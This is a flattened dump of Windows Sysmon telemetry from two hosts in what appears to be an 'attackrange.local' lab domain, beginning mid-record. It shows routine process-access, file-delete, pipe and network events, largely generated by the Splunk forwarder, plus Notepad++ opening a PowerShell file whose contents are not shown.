Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla 
Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001052544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:02:06.353{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.3924.432.101195511C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001052543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:02:06.353{466BC892-53D9-60E8-E60F-00000000CF01}3924\chrome.3924.432.101195511C:\Program Files\Mozilla Firefox\firefox.exe 354300x80000000000000001052542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:57.537{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51167-false10.0.1.12-8000- 23542300x80000000000000001052549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:07.923{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83AB3577EFD83ABBB4D58749B4BDF998,SHA256=5738A164AC634F56CE43625F0A6CCB912F4D70BD1AA53A3DC3D0ED368F59DA66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809332Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:07.708{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFD515D71FFBE247FC1590B5E0266D73,SHA256=CC7BF033585D5F9A6849AC938B1C7C359C9E2EB33E6441B0FE85978E8D0F893E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.938{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18093B3776608C44FA68722E9FA2914C,SHA256=C8FBE90BADBC3D3BF6F1BC99054BAFC88534DBCDECBA85D796687B215518129A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809333Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:08.786{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=853B149B6071C630562ACFB17F474C6D,SHA256=C4DF876C7B1A968E4A8A999EFA7AB31915204D5A6519E12E780FB06DBF77DB4B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:08.738{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c46e|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x80000000000000001052555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:08.691{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F700-60EB-B57D-00000000CF01}948C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.691{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F700-60EB-B57D-00000000CF01}948C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:08.691{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F700-60EB-B57D-00000000CF01}948C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.690{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F700-60EB-B57D-00000000CF01}948C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.686{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F700-60EB-B57D-00000000CF01}948C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:08.685{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F700-60EB-B57D-00000000CF01}948C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:09.938{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7BE60935CC70D7F24F09A06DBC89D1D,SHA256=6AC7909FCAE2FACAEE3D57204527E96B7C660F8EEE5F3F2D5B768F40A314A036,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809334Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:09.802{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=646A56777BC94B5241F06E10F880EFF7,SHA256=BA2FBE64267ED4224B0D0F1F008BB46B65AC57D8BAC0603FB7B4879E3885FDDA,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001052559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:09.669{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E0F0DF434F92EDD948C6CCCBD25490C,SHA256=2EA21B565360021B887C5C6BD79785101D90C297E38C827554DD82DA9FF2C01D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:09.669{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65F28B8BF0C1567D79AB2EABFB9BD51E,SHA256=2E149DA1FAE2728A3F5A0AD794CC0B6A2BA33DEB45BDB4752C95A656BBC5B453,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:10.953{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5451D10A79051DF0EF83382D9CB9F5CD,SHA256=A795D0128DE48CCEFAC5F8BC19E30DA1D28598F35E1FF5E8425E361BCDBF8520,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809336Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:10.833{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EA7DFAD07B6BC5EC7FCADDA485A1C47,SHA256=4C0F7043D1C79DA38712CD6071D5D9A84CA7986F1C7104646C7767F115C43DC5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809335Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:09.247{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57391-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:11.967{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CDA6C16DC36516ACB74ADEA8C613DEB,SHA256=F5E62AE3A9F88538D4A828FEF0FA647AA9EA2C586FE5EC25BF1818E3E130D1D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809337Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:11.849{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD4FFAB2B51A426222E33F2A8F6201C,SHA256=EA6DCE5458A3785BB5565DBE46B7B23BBA62D4E20F0C6CB531DDDC1648637F50,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:11.936{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F703-60EB-B67D-00000000CF01}8748C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:11.936{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F703-60EB-B67D-00000000CF01}8748C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0|C:\Windows\System32\SHELL32.dll+16ad2e|C:\Windows\System32\SHELL32.dll+737a1|C:\Windows\System32\SHELL32.dll+76686|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x80000000000000001052563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:11.935{466BC892-F703-60EB-B67D-00000000CF01}8748C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" 
"C:\Temp\test\sd2.ps1"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 354300x80000000000000001052562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:02.717{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51168-false10.0.1.12-8000- 23542300x80000000000000001052574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:12.969{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF52CB690B6A8E636E53FE500E496B58,SHA256=37F9EF1FC0C511AAD04DFC2A4F7393B40FC9ED1390EAF4BA0F5AF2C1E6A01302,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809338Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:12.880{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B43F9BABCE5B9421ABE06FCABCBCE28,SHA256=3736AABB39F5B647D32A63F45589641B87BACE4C61E83C695C4DF1655C95A2B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:12.938{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E0F0DF434F92EDD948C6CCCBD25490C,SHA256=2EA21B565360021B887C5C6BD79785101D90C297E38C827554DD82DA9FF2C01D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:12.084{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:12.084{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x80000000000000001052575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:13.969{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAE7051562B41A0AD3D6332767100AD7,SHA256=0E26D74B680F90BCBD6097628A993D416E68774FCB320D3F9C1BC630080B0626,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809339Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:13.880{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 